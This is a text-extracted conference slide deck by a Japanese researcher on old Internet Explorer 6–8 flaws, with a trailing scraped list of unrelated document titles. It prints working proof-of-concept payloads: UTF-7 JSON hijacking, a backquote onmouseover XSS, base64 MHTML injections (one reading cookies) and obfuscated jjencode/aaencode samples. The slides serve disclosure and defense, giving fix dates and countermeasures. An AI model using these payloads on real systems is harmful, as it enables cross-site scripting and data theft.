Internet Explorer exSpoilt Milk codes ～ IEへの腐ったミルク攻撃～

Internet ExplorerexSpoilt Milk codes ～ IE への腐ったミルク攻撃～

Yosuke HASEGAWAhttp://j.mp/yosuke

2INNOVATION TO THE FUTURE NetAgent Co., Ltd.

Who am I ? 自己紹介

Yosuke HASEGAWA はせがわようすけ

NetAgent Co.,Ltd. R&D deptネットエージェント ( 株 ) 研究開発部

http://utf-8.jp/Writing obfuscated JavaScript

JavaScript の難読化エンジン書いてますe.g. jjencode, aaencode

Obfuscated JavaScript 難読化 JS$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"(\\\"\\"+$.__$+$.__$+$.___+$.$$$_+(![]+"")[$._$_]+(![]+"")[$._$_]+$._$+", \\"+$.__$+$.__$+$._$_+$.$_$_+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$._$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\\" )"+"\"")())();

javascript:alert("Hello, JavaScript")

jjencode - http://utf-8.jp/public/jjencode.html

Obfuscated JavaScript 難読化 JSﾟ ω ﾟﾉ = / ｀ｍ ´ ）ﾉ ~┻━┻ //*´∇ ｀ */ ['_']; o=( ﾟｰﾟ ) =_=3; c=( ﾟ Θ ﾟ ) =( ﾟｰﾟ )-( ﾟｰﾟ ); ( ﾟ Д ﾟ ) =( ﾟ Θ ﾟ )= (o^_ô)/ (o^_ô);( ﾟ Д ﾟ )={ ﾟ Θ ﾟ : '_' , ﾟ ω ﾟﾉ : (( ﾟ ω ﾟﾉ ==3) +'_') [ ﾟ Θ ﾟ ] , ﾟｰﾟﾉ :( ﾟ ω ﾟﾉ + '_')[o^_ô -( ﾟ Θ ﾟ )] , ﾟ Д ﾟﾉ :(( ﾟｰﾟ ==3) +'_')[ ﾟｰﾟ ] }; ( ﾟ Д ﾟ ) [ ﾟ Θ ﾟ ] =(( ﾟ ω ﾟﾉ ==3) +'_') [c^_ô];( ﾟ Д ﾟ ) ['c'] = (( ﾟ Д ﾟ )+'_') [ ( ﾟｰﾟ )+( ﾟｰﾟ )-( ﾟΘ ﾟ ) ];( ﾟ Д ﾟ ) ['o'] = (( ﾟ Д ﾟ )+'_') [ ﾟ Θ ﾟ ];( ﾟ o ﾟ )=( ﾟ Д ﾟ ) ['c']+( ﾟ Д ﾟ ) ['o']+( ﾟω ﾟﾉ +'_')[ ﾟ Θ ﾟ ]+ (( ﾟ ω ﾟﾉ ==3) +'_') [ ﾟｰﾟ ] + (( ﾟ Д ﾟ ) +'_') [( ﾟｰﾟ )+( ﾟｰﾟ )]+ (( ﾟｰﾟ==3) +'_') [ ﾟ Θ ﾟ ]+(( ﾟｰﾟ ==3) +'_') [( ﾟｰﾟ ) - ( ﾟ Θ ﾟ )]+( ﾟ Д ﾟ ) ['c']+(( ﾟ Д ﾟ )+'_') [( ﾟｰﾟ )+( ﾟｰﾟ )]+ ( ﾟ Д ﾟ ) ['o']+(( ﾟｰﾟ ==3) +'_') [ ﾟ Θ ﾟ ];( ﾟ Д ﾟ ) ['_'] =(o^_ô) [ ﾟo ﾟ ] [ ﾟ o ﾟ ];( ﾟ ε ﾟ )=(( ﾟｰﾟ ==3) +'_') [ ﾟ Θ ﾟ ]+ ( ﾟ Д ﾟ ) . ﾟ Д ﾟﾉ +(( ﾟ Д ﾟ )+'_') [( ﾟｰﾟ ) + ( ﾟｰﾟ )]+(( ﾟｰﾟ ==3) +'_') [o^_ô - ﾟ Θ ﾟ ]+(( ﾟｰﾟ ==3) +'_') [ ﾟ Θ ﾟ ]+ ( ﾟ ω ﾟﾉ +'_') [ ﾟΘ ﾟ ]; ( ﾟｰﾟ )+=( ﾟ Θ ﾟ ); ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]='\\'; ( ﾟ Д ﾟ ). ﾟ Θ ﾟﾉ =( ﾟ Д ﾟ + ﾟｰﾟ )[o^_ô -( ﾟΘ ﾟ )];(o ﾟｰﾟ o)=( ﾟ ω ﾟﾉ +'_')[c^_ô];( ﾟ Д ﾟ ) [ ﾟ o ﾟ ]='\"';( ﾟ Д ﾟ ) ['_'] ( ( ﾟ Д ﾟ ) ['_'] ( ﾟ ε ﾟ +( ﾟ Д ﾟ )[ ﾟ o ﾟ ]+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ ( ﾟｰﾟ )+ ( ﾟ Θ ﾟ )+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟΘ ﾟ )+ (( ﾟｰﾟ ) + ( ﾟ Θ ﾟ ))+ ( ﾟｰﾟ )+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ ( ﾟｰﾟ )+ (( ﾟｰﾟ ) + ( ﾟ Θ ﾟ ))+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ ((o^_ô) +(o^_ô))+ ((o^_ô) - ( ﾟ Θ ﾟ ))+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟΘ ﾟ )+ ((o^_ô) +(o^_ô))+ ( ﾟｰﾟ )+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+(( ﾟｰﾟ ) + ( ﾟ Θ ﾟ ))+ (c^_ô)+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟｰﾟ )+ ((o^_ô) - ( ﾟ Θ ﾟ ))+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ ( ﾟ Θ ﾟ )+ (c^_ô)+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ ( ﾟｰﾟ )+ (( ﾟｰﾟ ) + ( ﾟ Θ ﾟ ))+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ (( ﾟｰﾟ ) + ( ﾟ Θ ﾟ ))+ ( ﾟｰﾟ )+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ (( ﾟｰﾟ ) + ( ﾟ Θ ﾟ ))+ ( ﾟｰﾟ )+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ (( ﾟｰﾟ ) + ( ﾟ Θ ﾟ ))+ (( ﾟｰﾟ ) + (o^_ô))+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+(( ﾟｰﾟ ) + ( ﾟ Θ ﾟ ))+ ( ﾟｰﾟ )+ ( ﾟД ﾟ )[ ﾟ ε ﾟ ]+( ﾟｰﾟ )+ (c^_ô)+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ ( ﾟ Θ ﾟ )+ ((o^_ô) - ( ﾟ Θ ﾟ ))+ ( ﾟД ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ ( ﾟｰﾟ )+ ( ﾟ Θ ﾟ )+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ ((o^_ô) +(o^_ô))+ ((o^_ô) +(o^_ô))+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ ( ﾟｰﾟ )+ ( ﾟ Θ ﾟ )+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ ((o^_ô) - ( ﾟ Θ ﾟ ))+ (o^_ô)+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ ( ﾟｰﾟ )+ (o^_ô)+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ ((o^_ô) +(o^_ô))+ ((o^_ô) - ( ﾟ Θ ﾟ ))+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ (( ﾟｰﾟ ) + ( ﾟ Θ ﾟ ))+ ( ﾟ Θ ﾟ )+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟ Θ ﾟ )+ ((o^_ô) +(o^_ô))+ (c^_ô)+ ( ﾟ Д ﾟ )[ ﾟε ﾟ ]+( ﾟ Θ ﾟ )+ ((o^_ô) +(o^_ô))+ ( ﾟｰﾟ )+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+( ﾟｰﾟ )+ ((o^_ô) - ( ﾟ Θ ﾟ ))+ ( ﾟ Д ﾟ )[ ﾟ ε ﾟ ]+(( ﾟｰﾟ ) + ( ﾟ Θ ﾟ ))+ ( ﾟ Θ ﾟ )+ ( ﾟ Д ﾟ )[ ﾟ o ﾟ ]) ( ﾟ Θ ﾟ )) ('_');

aaencode - http://utf-8.jp/public/aaencode.html

javascript:alert("Hello, JavaScript")

＼難解セキュリティ／

Obfuscated JavaScript 難読化 JS

jjencode is used for actual attackingjjencode で難読化されたコードが実際に攻撃に利用

Injected malicious JS code obfuscated by jjencode at some Italian sites using Joomla! イタリアの複数の Joomla! 使用サイトにて悪意のある難読化コードが挿入

Obfuscated JavaScript 難読化 JS

More info fromhttp://www.malwaredomainlist.com/

forums/index.php?topic=4354.0http://extraexploit.blogspot.com/

2010/10/dollars-javascript-code-yet-another.html

Today's topic今日の話題

Today's topic 今日の話題

IE6 is 'spoilt milk' web browser.IE6 は腐ったミルクみたいなブラウザMicrosoft themselves admitted

Microsoft 自身も認めているMany security flaws left

untouched for years.長い間放置されている問題点が多数。

Junst only IE6? No.IE6 だけ ? まさか。

IE6 is 'spoilt milk' browserIE6 は腐ったミルクみたいなブラウザ

Many flaws left untouched for years長い間放置されている問題点が多数

http://www.youtube.com/watch?v=KZSnCbGDl6Y

Just only IE6? No. IE6 だけ ? まさか。

Also IE7 and IE8 has flawsIE7/8 も問題あり

for the IE9 IE9 に向けて

expect IE becomes more secure browser by shedding light on past flaws 既存の問題点を明らかにすることで IE9をセキュアなものに !

Untouched flaws放置されたままの問題点

INNOVATION TO THE FUTURE NetAgent Co., Ltd.

Untouched flaws 放置されたままの脆弱性

flawsaffect

MLang encode conversion issue

JSON Hijack with UTF-7

bypass Content-Dispositioninfomation leakage via CSSJavaScript back-quote issue

XSS with mhtml handler ✓

✓ ✓

flawsaffect

✓ ✓

MLang encode conversion issueMLang のエンコード変換時の問題

"MLang" : DLL for multi language support including conversion of text encoding

MLang : 文字エンコーディング変換などを含む、複数の言語をサポートするためのDLL

ConvertINetMultiByteToUnicodeConvertINetUnicodeToMultiByteConvertINetString

IE handles text as Unicode from outside with conversion by MLang. IE は MLang を使って外部からの文字列をUnicode に変換して処理

Shift_JIS,EUC-JP,EUC-KR, …

HTML MLang<html

UTF-16LE

Converted to Unicode accordingly when given broken byte sequence. 壊れたバイト列を渡したときも、それなりに Unicode に変換される

"Converted accordingly"...「それなりに変換」

meta characters ("<>) which don't exist in original byte sequence are generated.もとのバイト列に存在しない「 "<> 」などが生成され、 XSS につながる

(0xNN)s are invalid byte sequence for charset XXXXX0xNN は文字コード XXXXX において不正なバイト列

too hard to prevent XSS by server-side.サーバ側での XSS 防止はたいへん

validate all letters/bytes as the charset encoding文字エンコーディングとして適切か全文字 / 全バイトを検証

Not published for details now現状は詳細は非公開

Affected : IE6 / IE7 IE8 : fixed

Reported : Oct 2007

flawsaffect

✓ ✓

flawsaffect

✓ ✓

Target:Containing secret data in JSON

機密情報を含む JSONIf attacker can control a part of JSON

string攻撃者が JSON 内の一部をコントロールできる

e.g., Web mail notification例えば Web メールの新着通知など

Attacker can read inside data of the JSONJSON 内のデータを盗み見できる

[ { "name" : "abc+MPv/fwAiAH0AXQA7-var t+AD0AWwB7ACIAIg-:+ACI-", "mail" : "hasegawa@utf-8.jp" }, { "name" : "John Smith", "mail" : "john@example.com" }]

JSON for target : http://example.com/newmail.json

Injected by attacker

This means...

[ { "name" : "abc"}];var t=[{"":"", "mail" : "hasegawa@utf-8.jp" }, { "name" : "John Smith", "mail" : "john@example.com" }]

convert from UTF-7 to another encoding...

trap HTML page created by attacker<script src="http://example.com/newmail.json" charset="utf-7"><script> alert( t[ 1 ].name + t[ 1 ].mail ); </script>

XHR.send(…)

{ "from" : "a@example.com" }

eval( JSON )

Web mail

{ "from" : "+MPv/…ACI-" }

HTMLAttacker

Web mail

From: "+MPv…ACI-"

Content-Type: application/json; charset=utf-8

trap HTML page created by attacker<script src="http://example.com/newmail.json" charset="utf-7">

charset in HTTPresponse header

priority

Published at Black Hat Japan 2008 and POC2008Black Hat Japan 2008, POC2008にて発表

Affected : IE6 / IE7 IE8 : fixed

Reported : Oct 2008

Countermeasure by serverサーバ側での対策Escape "+" to "\u002b" in JSON

JSON 内の + を \u002b にエスケープAccept only POST

POST のみ受け入れる

{ "name" : "abc\u002bMPv/f...QA7-var t\u002bAD0A...."}

flawsaffect

✓ ✓

flawsaffect

✓ ✓

Content-Type: text/html; charset=utf-8Content-Disposition: attachment; filename=attach.html

Bypass Content-DispositionContent-Disposition の回避 Content-Disposition: attachmentDownload directive for browsers

ブラウザへのダウンロード指令often uses for preventing for

XSSXSS の対策にときどき使用される

Bypass Content-DispositionContent-Disposition の回避

Bypass "Content-Disposition: attachment" with specially crafted JavaScript by attacker.攻撃者の細工した JavaScript によりダウンロード指令をバイパス可能

trap page by attacker 攻撃者による罠ページ

http://example.com/download.cgi : target content with "Content-Disposition: attachment" . 「 Content-Disposition:attachment 」のついた攻撃対象コンテンツ

Published: Jul 2007 in Japan2007 年 7 月に日本で公開

Affected : IE6 / IE7 / IE8No way to prevent XSS by

server-sideサーバ側での対策方法はない

flawsaffect

✓ ✓

flawsaffect

✓ ✓

infomation leakage via CSSCSS を通じた情報の漏えい

leakage of sensitive data from HTML via CSS "font-family", "quotes"CSS の font-family や quotes を通じて HTML 内の機密情報が漏えい

Fixed : MS10-071 at Oct 2010

<html><div>}.a{font-family:a</div><div>Secret data</div>

trap page created by attacker

target page containing sensitive data

<html><div>}.a{font-family:a</div><div>Secret data</div>

trap page created by attacker

target page containing sensitive data

Published: Nov 2008 in Japan2008 年 11 月に日本で公開

Republished: Sep 2010, SA412712010 年 9 月、 Secunia よりアドバイザリ

Fixed: MS10-071 – Oct 20102010 年 10 月、 MS10-071 にて修正

Affected : IE6 / IE7 / IE8

flawsaffect

✓ ✓

flawsaffect

✓ ✓

JavaScript back-quotes issueJavaScript バッククォート問題

IE treats the accent grave (`) as an attribute delimiter like " and '.IE はバッククォートを " や ' のように引用符として扱う<input type="text" id='x' value=`abcd` />

JavaScript back-quotes issueJavaScript バッククォート問題Quotation mark (") will be

stripped from the attribute value when using innerHTML property in case it doesn't contain space.innerHTML を参照したときに属性値にスペースがなければ引用符 (") は削除される<div id="x"><input type="text" value="abcd" ></div>...alert( $("x").innerHTML );

<div id="div1"><input type="text" value="``onmouseover=alert(1)" ></div><div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>

Published : Apr 2007 in Japan2007 年 4 月に日本で公開

Affected : IE6 / IE7 / IE8Reported : Nov 2007 as IE8 beta

feedback

2007 年 11 月に IE8beta のフィードバックとして報告"keep this behavior for backward

compatibility", MS said.「後方互換性のためにこの動作を残す」

flawsaffect

✓ ✓

flawsaffect

✓ ✓

XSS with mhtml handlermhtml ハンドラによる XSS

At one time, IE had assumed and handled any contents as MHTML by using "mhtml" handler.かつて IE は、 mhtml ハンドラを経由するとあらゆるコンテンツを MHTML であるとして取り扱っていた

MHTML - Web archive format defined RFC2557

From: hasegawa@utf-8.jpTo: someone@example.comSubject: testMIME-Version: 1.0Content-Type: text/html; charset=us-ascii

<html><body><h1>Hello</h1></body></html> *.eml or *.mht

mhtml:http://example.com/test.html

<html><div>Subject: testContent-Type: text/html; charset=us-asciiContent-Transfer-Encoding: base64

PGh0bWw+DQo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKTs8L3NjcmlwdD4NCjwvaHRtbD4NCg==</div></html>

<html><script>alert(document.location);</script></html>

Injected by attacker

mhtml:http://example.com/test.html

<html><div>Subject: testContent-Type: text/html; charset=us-asciiContent-Transfer-Encoding: base64

PGh0bWw+DQo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKTs8L3NjcmlwdD4NCjwvaHRtbD4NCg==</div></html>

Should be fixedby MS07-034

Should be fixed by MS07-034

XSS via mhtml again.mhtml による XSS 再び

"JavaScript execution via MHTML-scheme" at HTML5 Security Cheatsheet by @Lever_Onehttp://heideri.ch/jso/#96

<html> <body> <b>some content without two new line \n\n</b>Content-Type: multipart/related; boundary="***"<b>some content without two new line</b>--***Content-Location: xss.htmlContent-Transfer-Encoding: base64

PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1 cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9 dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg--</body> </html>

mhtml:http://heideri.ch/jso/test.html!xss.html

Published : May 2004 in Japan2004 年 5 月に日本で公開

Once fixed : Jun 2007 by MS07-0342007 年 6 月に MS07-034 でいったん修正

Reopened : Jun 20102010 年 6 月に再発

Affected : IE6 / IE7 / IE8 XP only?

flawsaffect

✓ ✓

flawsaffect

✓ ✓

How isIE9?

flawsaffect

6 7 8 9

✓ ✓

Fixed at IE9bIE9 ベータでは修正済み

Conclusionまとめ

Conclusion まとめ

IE6/7/8 have many flaws which were spotted ages ago and still have not been effectively addressedIE6/7/8 とも長いあいだ修正されていない問題が多数存在

These are fixed in IE9 beta.IE9 beta ではそれらは修正済み

Report flaws of IE9 while beta, if you find.IE9 の問題を見つけたならベータの間に報告Probably, too slowly to fix after releasing IE9

IE9 リリース後は修正は遅くなるかも !?

References 参考資料

Attacking with Character Encoding for Profit and Funhttp://bit.ly/alE7F3

JUMPERZ.NEThttp://www.jumperz.net/test/xss10.jsp

CSSXSS を改良した？手法で mixi の post_key を抜き取るデモを作りました - ?D of K http://d.hatena.ne.jp/ofk/20081111/1226407593

Internet Explorer Cross-Origin CSS Style Sheet Handling Vulnerability - Advisories - Community http://secunia.com/advisories/41271/

［これはひどい］ IE の引用符の解釈－＠ IT http://www.atmarkit.co.jp/fcoding/articles/webapp/01/webapp01a.html

[openmya:038082] MS07-034: mhtml: プロトコルハンドラによる任意のスクリプトの実行http://archive.openmya.devnull.jp/2007.06/msg00060.html

JavaScript execution via MHTML-scheme - HTML5 Security Cheatsheethttp://heideri.ch/jso/#96

Thanks to

David Ross and MSRC for helpful suggestions.

@Lever_One for telling details about mhtml issue.

...and You!Thank you for your attention.

Question? 質問

mailhasegawa@utf-8.jphasegawa@netagent.co.jp

Twitter@hasegawayosuke

Web sitehttp://utf-8.jp/

Internet Explorer exSpoilt Milk codes ～ IEへの腐ったミルク攻撃～

Documents

⻑期感染の実態と攻撃証跡の分析 - IPA · 「ファイルレス攻撃」 •ファイルレス攻撃 – マルウェア等の実ファイルを⽣成しない攻撃。スク

耐腐蝕性SUS303 - PISCO

乳児用液体ミルクについて...アメリカ EU 韓国 Similac(Abbott) Enfamil Gerber (Nestle)など Aptamil(Danon) Nestle Hipp など Babience(LG) 南陽など液体ミルク製品の一例

P&Pミルク分析機 LC-MINI 161007 yk - BSアドバンシ …P_LC-MINI.pdfMicrosoft Word - P&Pミルク分析機_LC-MINI_161007_yk.docx Created Date 10/11/2016 5:46:56 AM

65.080 备案号： HG - bzw.com.cn · 硝基腐植酸 nitro humic acid 矿物源腐植酸原料（粉剂）与硝酸反应得到的产品。 3.2 腐植酸和黄腐酸总量 humic

苹果腐烂病 Apple canker

国际反腐败运动的发展特点及对中国反腐败运动的建议

第八章防腐蚀工程

「腐食防食講座－高温腐食の基礎と対策技術－」 ... 「腐食防食講座−高温腐食の基礎と対策技術−」第4報：焼却プラントにおける高温腐食と対策

液体ミルク液体ミルクは栄養ハンドブック...3 4 やけどに注意しながら、一度沸騰させたお湯(70 以上)を哺乳瓶に注ぎます。粉ミルクの缶の説明書を目安に、必要

ログを活用した高度サイバー攻撃（標的型攻撃）の …...2015/11/24 · ログを活用した高度サイバー攻撃（標的型攻撃）の早期発見と分析

2012 MAR NEWS No. 414 3 - NICT攻撃サービス不能（DoS）攻撃など（Ⅰ）脆弱性に起因しない攻撃（Ⅱ）脆弱性に起因した攻撃 nicterによる攻撃の観測・分析

香與臭 - 論食品的好壞腐敗黃顯宗 96.09.. 討論誰喜歡？不拒絕吃，調查豆腐乳臭豆腐皮蛋發酵乳

めっき皮膜の腐食と分析 - TRI-Osakatri-osaka.jp/c/content/files/archives/mekkihimaku.pdf2 3 腐食損失度の例腐食形態％全面腐食 31.5 応力腐食割れ＆疲労腐食割れ

四、腐敗魚之食物中毒

NUTRIENT HEALTH NUTRIENT HEALTH NUTRIENT ...22 NUTRIENT HEALTH NUTRIENT HEALTH NUTRIENT HEALTH NUTRIENT HEALTH 製品成分単位木綿豆腐絹ごし豆腐ソフト豆腐充てん

【衝撃データロガー】 IMPAK-02 - センサーを中心 …€衝撃データロガー】物流中に生じる衝撃を常時監視！輸送中の商品やコンテナ、車輌等に加わる衝撃を記録する

DDoS攻撃10年の歴史を振り返る - JANOG...DDoS攻撃 DDoS攻撃（協調分散型DoS攻撃、分散型サービス拒否攻撃、Distributed Denial of Service attack）とは、踏み台と呼ばれる複数のコン

【豆知識】腐食 Trivia About Corrosion

HRSG腐食トラブル対策（FAC，りん酸塩腐食），環境対策（脱 … · HRSG腐食トラブル対策（FAC，りん酸塩腐食），環境対策（脱ヒドラジン）としてのHigh-AVT(LO)水処理運用実績

Internet Explorer exSpoilt Milk codes ～ IEへの腐ったミルク攻撃 ～

Internet Explorer exSpoilt Milk codes ～ IEへの腐ったミルク攻撃～